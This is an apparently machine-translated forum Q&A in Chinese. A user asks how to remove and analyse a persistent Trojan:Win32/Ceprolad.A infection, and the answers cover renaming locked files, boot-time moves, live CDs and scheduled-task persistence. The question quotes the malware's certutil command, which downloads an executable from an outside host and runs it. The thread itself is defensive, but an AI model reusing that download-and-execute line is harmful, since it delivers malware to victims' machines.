每次我启动我的电脑时,Windows Defender 都会显示一条通知,说病毒 Trojan:Win32/Ceprolad.A 已被删除,这意味着它确实没有被删除,因为我这些天尝试过的大多数防病毒软件(Panda、Avast .. .)
这个线程的详细信息是:
命令行:C:\Windows\System32\cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\NMolinero\AppData\Local\Temp\csrss \scheduled.exe && C:\Users\NMolinero\AppData\Local\Temp\csrss\scheduled.exe /31340
我想找到它并删除它,而不是仅仅将我的 Windows 操作系统恢复到以前的点,所以我想使用 IDA、Ollydbg 调试代码......但我对此很陌生,所以我我不知道如何获取恶意软件的样本来分析它(我有一个虚拟机)或者是否有更好的方法来做到这一点。
欢迎任何建议!
我假设恶意软件已经在您的磁盘上(并非所有恶意软件都会命中磁盘!)。因此,在遵循此答案时请记住这一点。如果不是这种情况,请提供更多信息。
在 Windows 上,许多正在使用且因此无法删除的文件可以通过以下两种方式之一进行处理:
ren命令提示符上的命令应该有帮助)smss.exe) 在引导期间尽早移动文件通过重命名文件,您通常可以确保下次尝试加载恶意软件时,它会失败。但是,如果涉及某种植入程序,一次又一次地尝试下载此恶意软件,则可能会失败。
在这种情况下,您可以尝试对上述两种方法进行变体。您可以创建一个与恶意软件文件同名的目录,或者如果这涉及目录,则创建一个文件。因此,鉴于路径,C:\Users\NMolinero\AppData\Local\Temp\csrss\scheduled.exe您有两个选择:
C:\Users\NMolinero\AppData\Local\Temp\csrss为其他名称,然后创建一个具有相同完整路径的文件。C:\Users\NMolinero\AppData\Local\Temp\csrss\scheduled.exe并创建一个具有完全相同完整路径的目录(是的,具有.exe文件扩展名的文件夹)。对于我上面提到的 MoveFile 方法,您可能必须创建一个任意名称的文件夹,并使用 MoveFile 将其重命名为C:\Users\NMolinero\AppData\Local\Temp\csrss或C:\Users\NMolinero\AppData\Local\Temp\csrss\scheduled.exe。也就是说,根据您观察到的确切行为,您可能不得不稍微偏离我概述的“整体”方法。
从理论上讲,所有这些仍然可能失败。我们可以合理地假设您提供的文件路径是恶意软件实体的实际文件路径,因为它们出现在正在执行的命令的上下文中。通常,恶意软件也有可能通过使用对 Win32 子系统无效的路径或文件名来伪装自己(请参阅此处)。在这种情况下,您将不得不使用替代路径符号之一(在链接的文章中解释),以便在 Win32 子系统层逃避路径转换和“审查”。
如果以上所有条件都失败了,您可能想要获取支持 NTFS 文件系统的最近的 Live CD(Linux Mint、Ubuntu 等等)(我必须在这里再次假设),以便进行上述操作在您的 Windows 系统(以及恶意软件)处于休眠状态时进行修改。
完成这些步骤后,您应该能够提取恶意软件并使用您喜欢的任何工具执行您想要的任何静态分析。
如果 MoveFile 失败或由于某种原因您无法使用它,您始终可以尝试通过PendingFileRenameOperations注册表值安排移动操作。但坦率地说,如果恶意软件阻止您使用诸如 MoveFile 或注册表编辑器之类的东西,您可能希望使用我描述为最后手段的“离线”方法。
基于该命令行,我认为有一个计划任务(或 WMI 条目)定期运行以再次下载文件,这就是它没有被删除的原因。出于性能原因,Defender 可能不会在没有完整扫描的情况下搜索这些位置。